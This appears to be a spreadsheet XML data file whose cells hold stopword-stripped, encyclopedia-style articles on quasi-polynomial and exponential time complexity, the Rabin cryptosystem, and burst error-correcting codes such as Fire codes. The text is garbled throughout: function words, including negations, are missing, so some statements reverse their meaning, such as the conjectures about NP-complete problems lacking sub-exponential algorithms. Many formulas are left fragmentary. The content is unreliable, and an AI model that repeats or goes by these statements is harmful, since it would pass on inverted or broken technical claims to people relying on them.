steiner tree problem, quasi-polynomial time approximation algorithm achieving approximation factor {\displaystyle o(\log ^{3}n)} number vertices), showing existence polynomial time algorithm open problem. other computational problems quasi-polynomial time solutions known polynomial time solution include planted clique problem goal find large clique union clique random graph. although quasi-polynomially solvable, conjectured planted clique problem polynomial time solution; planted clique conjecture used computational hardness assumption prove difficulty several problems computational game theory, property testing, machine learning.the complexity class consists problems quasi-polynomial time algorithms. defined terms dtime follows. dtime {\displaystyle {\mbox{qp}}=\bigcup _{c\in \mathbb }{\mbox{dtime}}\left(2^{\log ^{c}n}\right)} relation np-complete problems complexity theory, unsolved versus problem asks problems polynomial-time algorithms. best-known algorithms np-complete problems like 3sat etc. take exponential time. indeed, conjectured many natural np-complete problems sub-exponential time algorithms. here "sub-exponential time" taken mean second definition presented below. hand, many graph problems represented natural adjacency matrices solvable subexponential time simply size input square number vertices.) this conjecture (for k-sat problem) known exponential time hypothesis. since conjectured np-complete problems quasi-polynomial time algorithms, inapproximability results field approximation algorithms make assumption np-complete problems quasi-polynomial time algorithms. example, known inapproximability results cover problem. sub-exponential time term sub-exponential time used express running time algorithm grow faster polynomial still significantly smaller exponential. sense, problems sub-exponential time algorithms somewhat tractable exponential algorithms. precise definition "sub-exponential" generally agreed upon, list widely used ones below. first definition problem said sub-exponential time solvable solved running times whose logarithms grow smaller given polynomial. more precisely, problem sub-exponential time every exists algorithm solves problem time o(2nε). problems complexity class subexp defined terms dtime follows. subexp dtime {\displaystyle {\text{subexp}}=\bigcap _{\varepsilon &gt;0}{\text{dtime}}\left(2^{n^{\varepsilon }}\right)} this notion sub-exponential non-uniform terms sense part input algorithm problem. second definition some authors define sub-exponential time running times {\displaystyle 2^{o(n)}} this definition allows larger running times first definition sub-exponential time. example sub-exponential time algorithm best-known classical algorithm integer factorization, general number field sieve, runs time {\displaystyle 2^{{\tilde {o}}(n^{1/3})}} length input another example graph isomorphism problem, best known algorithm 1982 2016 solved {\displaystyle 2^{o\left({\sqrt {n\log n}}\right)}} however, stoc 2016 quasi-polynomial time algorithm presented.it makes difference whether algorithm allowed sub-exponential size instance, number vertices, number edges. parameterized complexity, difference made explicit considering pairs {\displaystyle (l,k)} decision problems parameters subept class parameterized problems time sub-exponential polynomial input size subept dtime poly {\displaystyle {\text{subept}}={\text{dtime}}\left(2^{o(k)}\cdot {\text{poly}}(n)\right).} more precisely, subept class parameterized problems {\displaystyle (l,k)} computable function {\displaystyle f:\mathbb \mathbb {\displaystyle f\in o(k)} algorithm decides time poly {\displaystyle 2^{f(k)}\cdot {\text{poly}}(n)} exponential time hypothesis exponential time hypothesis (eth) 3sat, satisfiability problem boolean formulas conjunctive normal form with, most, three literals clause variables, cannot solved time 2o(n). more precisely, hypothesis absolute constant 3sat cannot decided time deterministic turing machine. with denoting number clauses, equivalent hypothesis ksat cannot solved time 2o(m) integer exponential time hypothesis implies exponential time algorithm said exponential time, t(n) upper bounded 2poly(n), poly(n) polynomial more formally, algorithm exponential time t(n) bounded o(2nk) constant problems admit exponential time algorithms deterministic turing machine form complexity class known exp. dtime {\displaystyle {\text{exp}}=\bigcup _{c\in \mathbb }{\text{dtime}}\left(2^{n^{c}}\right)} sometimes, exponential time used refer algorithms t(n) 2o(n), exponent linear function this gives rise complexity class dtime {\displaystyle {\text{e}}=\bigcup _{c\in \mathbb }{\text{dtime}}\left(2^{cn}\right)} factorial time algorithm said factorial time t(n) upper bounded factorial function factorial time subset exponential time (exp) {\displaystyle n!=o\left(2^{n^{1+\epsilon }}\right)} {\displaystyle \epsilon however, subset example algorithm runs factorial time bogosort, notoriously inefficient sorting algorithm based trial error. bogosort sorts list items repeatedly shuffling list found sorted. average case, pass bogosort algorithm examine orderings items. items distinct, ordering sorted. bogosort shares patrimony infinite monkey theorem. double exponential time algorithm said double exponential time t(n) upper bounded 22poly(n), poly(n) polynomial such algorithms belong complexity class 2-exptime. 2-exptime dtime {\displaystyle {\mbox{2-exptime}}=\bigcup _{c\in \mathbb }{\mbox{dtime}}\left(2^{2^{n^{c}}}\right)} well-known double exponential time algorithms include: decision procedures presburger arithmetic computing gröbner basis worst case) quantifier elimination real closed fields takes least double exponential time, done time. also l-notation space complexity references</t>
  </si>
  <si>
    <t>Rabin cryptosystem</t>
  </si>
  <si>
    <t>rabin cryptosystem asymmetric cryptographic technique, whose security, like rsa, related difficulty integer factorization. however rabin cryptosystem advantage mathematically proven computationally secure chosen-plaintext attack long attacker cannot efficiently factor integers, proof known rsa.: disadvantage output rabin function generated four possible inputs; output ciphertext, extra complexity required decryption identify four possible inputs true plaintext. history algorithm published january 1979 michael rabin. rabin cryptosystem first asymmetric cryptosystem recovering plaintext ciphertext could proven hard factoring. encryption algorithm like asymmetric cryptosystems, rabin system uses pair: public encryption private decryption. public published anyone use, private remains known recipient message. generation keys rabin cryptosystem generated follows: choose large distinct prime numbers {\displaystyle {\displaystyle {\displaystyle p\equiv 3{\bmod {4}}} {\displaystyle q\equiv 3{\bmod {4}}} compute {\displaystyle n=pq} .then {\displaystyle public pair {\displaystyle (p,q)} private key. encryption message {\displaystyle encrypted first converting number {\displaystyle m&lt;n} using reversible mapping, computing {\displaystyle c=m^{2}{\bmod {n}}} ciphertext {\displaystyle decryption message {\displaystyle recovered ciphertext {\displaystyle taking square root modulo {\displaystyle follows. compute square root {\displaystyle modulo {\displaystyle {\displaystyle using formulas: {\displaystyle {\begin{aligned}m_{p}&amp;=c^{{\frac {1}{4}}(p+1)}{\bmod {p}}\\m_{q}&amp;=c^{{\frac {1}{4}}(q+1)}{\bmod {q}}\end{aligned}}} extended euclidean algorithm find {\displaystyle y_{p}} {\displaystyle y_{q}} {\displaystyle y_{p}\cdot p+y_{q}\cdot q=1} chinese remainder theorem find four square roots {\displaystyle modulo {\displaystyle {\displaystyle {\begin{aligned}r_{1}&amp;=\left(y_{p}\cdot p\cdot m_{q}+y_{q}\cdot q\cdot m_{p}\right){\bmod {n}}\\r_{2}&amp;=n-r_{1}\\r_{3}&amp;=\left(y_{p}\cdot p\cdot m_{q}-y_{q}\cdot q\cdot m_{p}\right){\bmod {n}}\\r_{4}&amp;=n-r_{3}\end{aligned}}} four values original plaintext {\displaystyle although four correct cannot determined without additional information. computing square roots show formulas step actually produce square roots {\displaystyle follows. first formula, want prove {\displaystyle m_{p}^{2}\equiv c{\bmod {p}}} since {\displaystyle p\equiv 3{\bmod {4}},} exponent {\textstyle {\frac {1}{4}}(p+1)} integer. proof trivial {\displaystyle c\equiv 0{\bmod {p}}} assume {\displaystyle divide {\displaystyle note {\displaystyle c\equiv m^{2}{\bmod {pq}}} implies {\displaystyle c\equiv m^{2}{\bmod {p}}} quadratic residue modulo {\displaystyle then {\displaystyle m_{p}^{2}\equiv c^{{\frac {1}{2}}(p+1)}\equiv c\cdot c^{{\frac {1}{2}}(p-1)}\equiv c\cdot 1\mod last step justified euler's criterion. example example, take {\displaystyle p=7} {\displaystyle q=11} {\displaystyle n=77} take {\displaystyle m=20} plaintext. ciphertext thus {\displaystyle c=m^{2}{\bmod {n}}=400{\bmod {77}}=15} decryption proceeds follows: compute {\displaystyle m_{p}=c^{{\frac {1}{4}}(p+1)}{\bmod {p}}=15^{2}{\bmod {7}}=1} {\displaystyle m_{q}=c^{{\frac {1}{4}}(q+1)}{\bmod {q}}=15^{3}{\bmod {11}}=9} extended euclidean algorithm compute {\displaystyle y_{p}=-3} {\displaystyle y_{q}=2} confirm {\displaystyle y_{p}\cdot p+y_{q}\cdot q=(-3\cdot 7)+(2\cdot 11)=1} compute four plaintext candidates: {\displaystyle {\begin{aligned}r_{1}&amp;=(-3\cdot 7\cdot 9+2\cdot 11\cdot 1){\bmod {77}}=64\\r_{2}&amp;=77-64=13\\r_{3}&amp;=(-3\cdot 7\cdot 9-2\cdot 11\cdot 1){\bmod {77}}=\mathbf {20} \\r_{4}&amp;=77-20=57\end{aligned}}} {\displaystyle r_{3}} desired plaintext. note four candidates square roots that candidate, {\displaystyle r_{i}^{2}{\bmod {77}}=15} {\displaystyle r_{i}} encrypts value, digital signature algorithm rabin cryptosystem used create verify digital signatures. creating signature requires private {\displaystyle (p,q)} verifying signature requires public {\displaystyle signing message {\displaystyle m&lt;n} signed private {\displaystyle (p,q)} follows. generate random value {\displaystyle cryptographic hash function {\displaystyle compute {\displaystyle c=h(m|u)} denotes concatenation. {\displaystyle integer less {\displaystyle treat {\displaystyle rabin-encrypted value attempt decrypt using private {\displaystyle (p,q)} this produce usual four results, {\displaystyle r_{1},r_{2},r_{3},r_{4}} might expect encrypting {\displaystyle r_{i}} would produce {\displaystyle however, true {\displaystyle happens quadratic residue modulo {\displaystyle {\displaystyle determine case, encrypt first decryption result {\displaystyle r_{1}} encrypt {\displaystyle repeat algorithm random {\displaystyle expected number times algorithm needs repeated finding suitable {\displaystyle having found {\displaystyle r_{1}} encrypts {\displaystyle signature {\displaystyle (r_{1},u)} verifying signature signature {\displaystyle (r,u)} message {\displaystyle verified using public {\displaystyle follows. compute {\displaystyle c=h(m|u)} encrypt {\displaystyle using public {\displaystyle signature valid encryption {\displaystyle equals {\displaystyle evaluation algorithm effectiveness decrypting produces three false results addition correct one, correct result must guessed. this major disadvantage rabin cryptosystem factors prevented finding widespread practical use. plaintext intended represent text message, guessing difficult; however, plaintext intended represent numerical value, issue becomes problem must resolved kind disambiguation scheme. possible choose plaintexts special structures, padding, eliminate problem. removing ambiguity inversion suggested blum williams: primes used restricted primes congruent modulo domain squaring restricted quadratic residues. these restrictions make squaring function trapdoor permutation, eliminating ambiguity. efficiency encryption, square modulo must calculated. this efficient rsa, requires calculation least cube. decryption, chinese remainder theorem applied, along modular exponentiations. here efficiency comparable rsa. disambiguation introduces additional computational costs, prevented rabin cryptosystem finding widespread practical use. security proven algorithm decrypts rabin-encrypted value used factor modulus {\displaystyle thus, rabin decryption least hard integer factorization problem, something proven rsa. generally believed polynomial-time algorithm factoring, implies efficient algorithm decrypting rabin-encrypted value without private {\displaystyle (p,q)} rabin cryptosystem provide indistinguishability chosen plaintext attacks since process encryption deterministic. adversary, given ciphertext candidate message, easily determine whether ciphertext encodes candidate message simply checking whether encrypting candidate message yields given ciphertext). rabin cryptosystem insecure chosen ciphertext attack (even challenge messages chosen uniformly random message space).: adding redundancies, example, repetition last bits, system made produce single root. this thwarts specific chosen-ciphertext attack, since decryption algorithm produces root attacker already knows. technique applied, proof equivalence factorization problem fails, uncertain 2004 variant secure. handbook applied cryptography menezes, oorschot vanstone considers equivalence probable, however, long finding roots remains two-part process roots {\displaystyle {\bmod {p}}} {\displaystyle {\bmod {q}}} application chinese remainder theorem). also topics cryptography blum blum shub shanks–tonelli algorithm schmidt–samoa cryptosystem blum–goldwasser cryptosystem kunerth's_algorithm notes references buchmann, johannes. einführung kryptographie. second edition. berlin: springer, 2001. isbn 3-540-41283-2 menezes, alfred; oorschot, paul vanstone, scott handbook applied cryptography. press, october 1996. isbn 0-8493-8523-7 rabin, michael. digitalized signatures public-key functions intractable factorization pdf). laboratory computer science, january 1979. scott lindhurst, analysis shank's algorithm computing square roots finite fields. gupta williams, proc conf theo assoc, 1999, proc notes, ams, 1999. kumanduri romero, number theory computer applications, 9.2.9, prentice hall, 1997. probabilistic square root quadratic residue modulo prime. external links menezes, oorschot, vanstone, scott: handbook applied cryptography (free downloads), chapter</t>
  </si>
  <si>
    <t>Burst error-correcting code</t>
  </si>
  <si>
    <t>coding theory, burst error-correcting codes employ methods correcting burst errors, errors occur many consecutive bits rather occurring bits independently other. many codes designed correct random errors. sometimes, however, channels introduce errors localized short interval. such errors occur burst (called burst errors) occur many consecutive bits. examples burst errors found extensively storage mediums. these errors physical damage scratch disc stroke lightning case wireless channels. they independent; tend spatially concentrated. error, likely adjacent bits could also corrupted. methods used correct random errors inefficient correct burst errors. definitions burst length {\displaystyle \ell codeword {\displaystyle transmitted, received {\displaystyle y=c+e.} then, error vector {\displaystyle called burst length {\displaystyle \ell nonzero components {\displaystyle confined {\displaystyle \ell consecutive components. example, 1000011 {\displaystyle e=(0{\textbf {1000011}}0)} burst length {\displaystyle \ell =7.} although definition sufficient describe burst error majority tools developed burst error correction rely cyclic codes. this motivates next definition. cyclic burst length {\displaystyle \ell error vector {\displaystyle called cyclic burst error length {\displaystyle \ell nonzero components confined {\displaystyle \ell cyclically consecutive components. example, previously considered error vector 010000110 {\displaystyle e=(010000110)} cyclic burst length {\displaystyle \ell since consider error starting position {\displaystyle ending position {\displaystyle notice indices {\displaystyle -based, first element position {\displaystyle remainder article, term burst refer cyclic burst, unless noted otherwise. burst description often useful compact definition burst error, encompasses length, also pattern, location error. define burst description tuple {\displaystyle (p,l)} {\displaystyle pattern error (that string symbols beginning first nonzero entry error pattern, ending last nonzero symbol), {\displaystyle location, codeword, burst found.for example, burst description error pattern 010000110 {\displaystyle e=(010000110)} 1000011 {\displaystyle d=(1000011,1)} notice description unique, 11001 {\displaystyle d'=(11001,6)} describes burst error. general, number nonzero components {\displaystyle {\displaystyle {\displaystyle {\displaystyle different burst descriptions starting different nonzero entry {\displaystyle remedy issues arise ambiguity burst descriptions theorem below, however need definition first. definition. number symbols given error pattern {\displaystyle denoted {\displaystyle \mathrm {length} (y).} theorem (uniqueness burst descriptions). suppose {\displaystyle error vector length {\displaystyle burst descriptions {\displaystyle (p_{1},l_{1})} {\displaystyle (p_{2},l_{2})} {\displaystyle \mathrm {length} (p_{1})+\mathrm {length} (p_{2})\leqslant n+1,} descriptions identical components equivalent.proof. {\displaystyle hamming weight number nonzero entries) {\displaystyle then {\displaystyle exactly {\displaystyle error descriptions. {\displaystyle w=0,1,} nothing prove. assume {\displaystyle w\geqslant descriptions identical. notice nonzero entry {\displaystyle appear pattern, components {\displaystyle included pattern form cyclic zeros, beginning last nonzero entry, continuing first nonzero entry pattern. call indices corresponding zero run. immediately observe burst description zero associated zero disjoint. since {\displaystyle zero runs, disjoint, total {\displaystyle n-w} distinct elements zero runs. hand have: number zeros {\displaystyle {\begin{aligned}n-w={\text{number zeros }}e&amp;=(n-\mathrm {length} (p_{1}))+(n-\mathrm {length} (p_{2}))\\&amp;=2n-\left(\mathrm {length} (p_{1})+\mathrm {length} (p_{2})\right)\\&amp;\geqslant 2n-(n+1)&amp;&amp;\mathrm {length} (p_{1})+\mathrm {length} (p_{2})\leqslant n+1\\&amp;=n-1\end{aligned}}} this contradicts {\displaystyle w\geqslant thus, burst error descriptions identical.a corollary theorem cannot distinct burst descriptions bursts length {\displaystyle {\tfrac {1}{2}}(n+1).} cyclic codes burst error correction cyclic codes defined follows: think {\displaystyle symbols elements {\displaystyle \mathbb _{q}} now, think words polynomials {\displaystyle \mathbb _{q},} individual symbols word correspond different coefficients polynomial. define cyclic code, pick fixed polynomial, called generator polynomial. codewords cyclic code polynomials divisible generator polynomial. codewords polynomials degree {\displaystyle \leqslant n-1} suppose generator polynomial {\displaystyle g(x)} degree {\displaystyle polynomials degree {\displaystyle \leqslant n-1} divisible {\displaystyle g(x)} result multiplying {\displaystyle g(x)} polynomials degree {\displaystyle \leqslant n-1-r} {\displaystyle q^{n-r}} polynomials. each corresponds codeword. therefore, {\displaystyle k=n-r} cyclic codes. cyclic codes detect bursts length {\displaystyle \ell =n-k=r} later burst error detection ability {\displaystyle (n,k)} code bounded {\displaystyle \ell \leqslant n-k} cyclic codes considered optimal burst error detection since meet upper bound: theorem (cyclic burst correction capability). every cyclic code generator polynomial degree {\displaystyle detect bursts length {\displaystyle \leqslant proof. need prove burst length {\displaystyle \leqslant codeword (i.e. polynomial divisible {\displaystyle g(x)} result going codeword (i.e. corresponding polynomial divisible {\displaystyle g(x)} suffices show burst length {\displaystyle \leqslant divisible {\displaystyle g(x)} such burst form {\displaystyle x^{i}b(x)} {\displaystyle \deg(b(x))&lt;r.} therefore, {\displaystyle b(x)} divisible {\displaystyle g(x)} (because latter degree {\displaystyle {\displaystyle g(x)} divisible {\displaystyle (otherwise, codewords would start {\displaystyle therefore, {\displaystyle x^{i}} divisible {\displaystyle g(x)} well.the proof suggests simple algorithm burst error detection/correction cyclic codes: given transmitted word (i.e. polynomial degree {\displaystyle \leqslant n-1} compute remainder word divided {\displaystyle g(x)} remainder zero (i.e. word divisible {\displaystyle g(x)} valid codeword. otherwise, report error. correct error, subtract remainder transmitted word. subtraction result going divisible {\displaystyle g(x)} (i.e. going valid codeword). upper bound burst error detection {\displaystyle \ell \leqslant n-k=r} know cyclic code detect bursts length {\displaystyle \ell however cyclic codes indeed detect bursts length {\displaystyle reason detection fails burst divisible {\displaystyle g(x)} over binary alphabets, exist {\displaystyle 2^{\ell -2}} bursts length {\displaystyle \ell those, {\displaystyle 2^{\ell -2-r}} divisible {\displaystyle g(x)} therefore, detection failure probability small {\displaystyle 2^{-r}} assuming uniform distribution bursts length {\displaystyle \ell consider fundamental theorem cyclic codes designing efficient burst-error correcting codes, categorizing bursts different cosets. theorem (distinct cosets). linear code {\displaystyle {\displaystyle \ell -burst-error-correcting code burst errors length {\displaystyle \leqslant \ell distinct cosets {\displaystyle .proof. {\displaystyle \mathbf _{1},\mathbf _{2}} distinct burst errors length {\displaystyle \leqslant \ell coset code {\displaystyle then {\displaystyle \mathbf =\mathbf _{1}-\mathbf _{2}} codeword. hence, receive {\displaystyle \mathbf _{1},} decode either {\displaystyle \mathbf {\displaystyle \mathbf contrast, burst errors {\displaystyle \mathbf _{1}} {\displaystyle \mathbf _{2}} coset, burst error determined syndrome. error corrected syndrome. thus, linear code {\displaystyle {\displaystyle \ell -burst-error-correcting code burst errors length {\displaystyle \leqslant \ell distinct cosets {\displaystyle .theorem (burst error codeword classification). {\displaystyle linear {\displaystyle \ell -burst-error-correcting code. then nonzero burst length {\displaystyle \leqslant 2\ell codeword.proof. {\displaystyle codeword burst length {\displaystyle \leqslant 2\ell thus pattern {\displaystyle (0,1,u,v,1,0)} {\displaystyle {\displaystyle words length {\displaystyle \leqslant \ell -1.} hence, words {\displaystyle w=(0,1,u,0,0,0)} {\displaystyle c-w=(0,0,0,v,1,0)} bursts length {\displaystyle \leqslant \ell binary linear codes, belong coset. this contradicts distinct cosets theorem, therefore nonzero burst length {\displaystyle \leqslant 2\ell codeword. burst error correction bounds upper bounds burst error detection correction upper bound, mean limit error detection ability never beyond. suppose want design {\displaystyle (n,k)} code detect burst errors length {\displaystyle \leqslant \ell natural question given {\displaystyle {\displaystyle maximum {\displaystyle \ell never achieve beyond? words, upper bound length {\displaystyle \ell bursts detect using {\displaystyle (n,k)} code? following theorem provides answer question. theorem (burst error detection ability). burst error detection ability {\displaystyle (n,k)} code {\displaystyle \ell \leqslant n-k.} proof. first observe code detect bursts length {\displaystyle \leqslant \ell codewords differ burst length {\displaystyle \leqslant \ell suppose code words {\displaystyle \mathbf _{1}} {\displaystyle \mathbf _{2}} differ burst {\displaystyle \mathbf length {\displaystyle \leqslant \ell upon receiving {\displaystyle \mathbf _{1}} tell whether transmitted word indeed {\displaystyle \mathbf _{1}} transmission errors, whether {\displaystyle \mathbf _{2}} burst error {\displaystyle \mathbf occurred transmission. now, suppose every codewords differ burst length {\displaystyle \ell even transmitted codeword {\displaystyle \mathbf _{1}} burst {\displaystyle \mathbf length {\displaystyle \ell going change another valid codeword. upon receiving tell {\displaystyle \mathbf _{1}} burst {\displaystyle \mathbf observation, know codewords share first {\displaystyle n-\ell symbols. reason even differ {\displaystyle \ell symbols, still going different burst length {\displaystyle \ell therefore, number codewords {\displaystyle q^{k}} satisfies {\displaystyle q^{k}\leqslant q^{n-\ell applying {\displaystyle \log _{q}} sides rearranging, {\displaystyle \ell \leqslant n-k} .now, repeat question error correction: given {\displaystyle {\displaystyle upper bound length {\displaystyle \ell bursts correct using {\displaystyle (n,k)} code? following theorem provides preliminary answer question: theorem (burst error correction ability). burst error correction ability {\displaystyle (n,k)} code satisfies {\displaystyle \ell \leqslant n-k-\log _{q}(n-\ell )+2} proof. first observe code correct bursts length {\displaystyle \leqslant \ell codewords differ bursts length {\displaystyle \leqslant \ell suppose codewords {\displaystyle \mathbf _{1}} {\displaystyle \mathbf _{2}} differ bursts {\displaystyle \mathbf _{1}} {\displaystyle \mathbf _{2}} length {\displaystyle \leqslant \ell each. upon receiving {\displaystyle \mathbf _{1}} burst {\displaystyle \mathbf _{1}} could interpret {\displaystyle \mathbf _{2}} burst {\displaystyle -\mathbf _{2}} tell whether transmitted word {\displaystyle \mathbf _{1}} {\displaystyle \mathbf _{2}} now, suppose every codewords differ bursts length {\displaystyle \ell even transmitted codeword {\displaystyle \mathbf _{1}} burst length {\displaystyle \ell going look like another codeword another burst. codeword {\displaystyle \mathbf {\displaystyle b(\mathbf denote words differ {\displaystyle \mathbf burst length {\displaystyle \leqslant \ell notice {\displaystyle b(\mathbf includes {\displaystyle \mathbf itself. observation, know different codewords {\displaystyle \mathbf _{i}} {\displaystyle \mathbf _{j},b(\mathbf _{i})} {\displaystyle b(\mathbf _{j})} disjoint. {\displaystyle q^{k}} codewords. therefore, {\displaystyle q^{k}|b(\mathbf )|\leqslant q^{n}} moreover, {\displaystyle (n-\ell )q^{\ell -2}\leqslant |b(\mathbf plugging latter inequality former, taking base {\displaystyle logarithm rearranging, theorem.a stronger result given rieger bound: theorem (rieger bound). {\displaystyle \ell burst error correcting ability {\displaystyle (n,k)} linear block code, {\displaystyle 2\ell \leqslant n-k} .proof. linear code correct burst pattern length {\displaystyle \leqslant \ell cannot burst length {\displaystyle \leqslant 2\ell codeword. burst length {\displaystyle \leqslant 2\ell codeword, burst length {\displaystyle \ell could change codeword burst pattern length {\displaystyle \ell also could obtained making burst error length {\displaystyle \ell zero codeword. vectors non-zero first {\displaystyle 2\ell symbols, vectors different subsets array difference codeword bursts length {\displaystyle 2\ell ensuring condition, number subsets least equal number vectors. thus, number subsets would least {\displaystyle q^{2\ell hence, least {\displaystyle 2\ell distinct symbols, otherwise, difference polynomials would codeword bursts length {\displaystyle \leqslant \ell thus, proves rieger bound.definition. linear burst-error-correcting code achieving rieger bound called optimal burst-error-correcting code. further bounds burst error correction there upper bound achievable code rate linear block codes multiple phased-burst correction (mpbc). bound constrained maximum correctable cyclic burst length within every subblock, equivalently constraint minimum error free length within every phased-burst. this bound, reduced special case bound single burst correction, abramson bound corollary hamming bound burst-error correction) cyclic burst length less half block length. theorem (number bursts). {\displaystyle 1\leqslant \ell \leqslant {\tfrac {1}{2}}(n+1),} binary alphabet, {\displaystyle n2^{\ell -1}+1} vectors length {\displaystyle bursts length {\displaystyle \leqslant \ell .proof. since burst length {\displaystyle \leqslant {\tfrac {1}{2}}(n+1),} unique burst description associated burst. burst begin {\displaystyle positions pattern. each pattern begins {\displaystyle contain length {\displaystyle \ell think strings begin {\displaystyle length {\displaystyle \ell thus, total {\displaystyle 2^{\ell -1}} possible patterns, total {\displaystyle n2^{\ell -1}} bursts length {\displaystyle \leqslant \ell include all-zero burst, {\displaystyle n2^{\ell -1}+1} vectors representing bursts length {\displaystyle \leqslant \ell theorem (bound number codewords). {\displaystyle 1\leqslant \ell \leqslant {\tfrac {1}{2}}(n+1),} binary {\displaystyle \ell -burst error correcting code {\displaystyle 2^{n}/(n2^{\ell -1}+1)} codewords.proof. since {\displaystyle \ell \leqslant {\tfrac {1}{2}}(n+1)} know {\displaystyle n2^{\ell -1}+1} bursts length {\displaystyle \leqslant \ell code {\displaystyle codewords, {\displaystyle mn2^{\ell -1}} codewords differ codeword burst length {\displaystyle \leqslant \ell each {\displaystyle words must distinct, otherwise code would distance {\displaystyle therefore, {\displaystyle m(2^{\ell -1}+1)\leqslant 2^{n}} implies {\displaystyle m\leqslant 2^{n}/(n2^{\ell -1}+1).} theorem (abramson's bounds). {\displaystyle 1\leqslant \ell \leqslant {\tfrac {1}{2}}(n+1)} binary linear {\displaystyle (n,k),\ell -burst error correcting code, block-length must satisfy: {\displaystyle n\leqslant 2^{n-k-\ell +1}-1.} proof: linear {\displaystyle (n,k)} code, {\displaystyle 2^{k}} codewords. previous result, know {\displaystyle 2^{k}\leqslant {\frac {2^{n}}{n2^{\ell -1}+1}}.} isolating {\displaystyle {\displaystyle n\leqslant 2^{n-k-\ell +1}-2^{-\ell +1}} since {\displaystyle \ell \geqslant {\displaystyle must integer, {\displaystyle n\leqslant 2^{n-k-\ell +1}-1} .remark. {\displaystyle r=n-k} called redundancy code alternative formulation abramson's bounds {\displaystyle r\geqslant \lceil \log _{2}(n+1)\rceil +\ell -1.} fire codes while cyclic codes general powerful tools detecting burst errors, consider family binary cyclic codes named fire codes, possess good single burst error correction capabilities. single burst, length {\displaystyle \ell mean errors received codeword possess within fixed span {\displaystyle \ell digits. {\displaystyle p(x)} irreducible polynomial degree {\displaystyle {\displaystyle \mathbb _{2}} {\displaystyle period {\displaystyle p(x)} period {\displaystyle p(x)} indeed polynomial, defined least positive integer {\displaystyle {\displaystyle p(x)|x^{r}-1.} {\displaystyle \ell positive integer satisfying {\displaystyle \ell \leqslant {\displaystyle 2\ell divisible {\displaystyle {\displaystyle period {\displaystyle p(x)} define fire code {\displaystyle following generator polynomial: {\displaystyle g(x)=\left(x^{2\ell -1}+1\right)p(x).} show {\displaystyle {\displaystyle \ell -burst-error correcting code. lemma {\displaystyle \gcd \left(p(x),x^{2\ell -1}+1\right)=1.} proof. {\displaystyle d(x)} greatest common divisor polynomials. since {\displaystyle p(x)} irreducible, {\displaystyle \deg(d(x))=0} {\displaystyle \deg(p(x))} assume {\displaystyle \deg(d(x))\neq {\displaystyle p(x)=cd(x)} constant {\displaystyle but, {\displaystyle (1/c)p(x)} divisor {\displaystyle x^{2\ell -1}+1} since {\displaystyle d(x)} divisor {\displaystyle x^{2\ell -1}+1} contradicts assumption {\displaystyle p(x)} divide {\displaystyle x^{2\ell -1}+1.} thus, {\displaystyle \deg(d(x))=0,} proving lemma.lemma {\displaystyle p(x)} polynomial period {\displaystyle {\displaystyle p(x)|x^{k}-1} {\displaystyle p|k.} proof. {\displaystyle p|k} {\displaystyle x^{k}-1=(x^{p}-1)(1+x^{p}+x^{2p}+\ldots +x^{k/p})} thus, {\displaystyle p(x)|x^{k}-1.} suppose {\displaystyle p(x)|x^{k}-1} then, {\displaystyle k\geqslant show {\displaystyle divisible {\displaystyle induction {\displaystyle base case {\displaystyle k=p} follows. therefore, assume {\displaystyle k&gt;p} know {\displaystyle p(x)} divides (since period {\displaystyle {\displaystyle x^{p}-1=(x-1)\left(1+x+\ldots +x^{p-1}\right)\quad {\text{and}}\quad x^{k}-1=(x-1)\left(1+x+\ldots +x^{k-1}\right).} {\displaystyle p(x)} irreducible, therefore must divide {\displaystyle (1+x+\ldots +x^{p-1})} {\displaystyle (1+x+\ldots +x^{k-1})} thus, also divides difference last polynomials, {\displaystyle x^{p}(1+x+\ldots +x^{p-k-1})} then, follows {\displaystyle p(x)} divides {\displaystyle (1+x+\cdots +x^{p-k-1})} finally, also divides: {\displaystyle x^{k-p}-1=(x-1)(1+x+\ldots +x^{p-k-1})} induction hypothesis, {\displaystyle p|k-p} {\displaystyle p|k} corollary lemma since {\displaystyle p(x)=x^{p}-1} period {\displaystyle {\displaystyle p(x)} divides {\displaystyle x^{k}-1} {\displaystyle p|k} theorem. fire code {\displaystyle \ell -burst error correctingif show bursts length {\displaystyle \ell less occur different cosets, coset leaders form correctable error patterns. reason simple: know coset unique syndrome decoding associated bursts different lengths occur different cosets, unique syndromes, facilitating error correction. proof theorem {\displaystyle x^{i}a(x)} {\displaystyle x^{j}b(x)} polynomials degrees {\displaystyle \ell _{1}-1} {\displaystyle \ell _{2}-1} representing bursts length {\displaystyle \ell _{1}} {\displaystyle \ell _{2}} respectively {\displaystyle \ell _{1},\ell _{2}\leqslant \ell integers {\displaystyle i,j} represent starting positions bursts, less block length code. contradiction sake, assume {\displaystyle x^{i}a(x)} {\displaystyle x^{j}b(x)} coset. then, {\displaystyle v(x)=x^{i}a(x)+x^{j}b(x)} valid codeword (since terms coset). without loss generality, pick {\displaystyle i\leqslant division theorem write: {\displaystyle j-i=g(2\ell -1)+r,} integers {\displaystyle {\displaystyle r,0\leqslant r&lt;2\ell rewrite polynomial {\displaystyle v(x)} follows: {\displaystyle v(x)=x^{i}a(x)+x^{i+g(2\ell -1)+r}=x^{i}a(x)+x^{i+g(2\ell -1)+r}+2x^{i+r}b(x)=x^{i}\left(a(x)+x^{b}b(x)\right)+x^{i+r}b(x)\left(x^{g(2\ell -1)}+1\right)} notice second manipulation, introduced term {\displaystyle 2x^{i+r}b(x)} allowed since fire codes operate {\displaystyle \mathbb _{2}} assumption, {\displaystyle v(x)} valid codeword, thus, must multiple {\displaystyle g(x)} mentioned earlier, since factors {\displaystyle g(x)} relatively prime, {\displaystyle v(x)} divisible {\displaystyle x^{2\ell -1}+1} looking closely last expression derived {\displaystyle v(x)} notice {\displaystyle x^{g(2\ell -1)}+1} divisible {\displaystyle x^{2\ell -1}+1} corollary lemma therefore, {\displaystyle a(x)+x^{b}b(x)} either divisible {\displaystyle x^{2\ell -1}+1} {\displaystyle applying division theorem again, exists polynomial {\displaystyle d(x)} degree {\displaystyle \delta that: {\displaystyle a(x)+x^{b}b(x)=d(x)(x^{2\ell -1}+1)} then write: {\displaystyle {\begin{aligned}\delta +2\ell -1&amp;=\deg \left(d(x)\left(x^{2\ell -1}+1\right)\right)\\&amp;=\deg \left(a(x)+x^{b}b(x)\right)\\&amp;=\deg \left(x^{b}b(x)\right)&amp;&amp;\deg(a(x))=\ell _{1}-1&lt;2\ell -1\\&amp;=b+\ell _{2}-1\end{aligned}}} equating degree sides, gives {\displaystyle b=2\ell -\ell _{2}+\delta since {\displaystyle \ell _{1},\ell _{2}\leqslant \ell conclude {\displaystyle b\geqslant \ell +\delta implies {\displaystyle b&gt;\ell {\displaystyle b&gt;\delta notice expansion: {\displaystyle 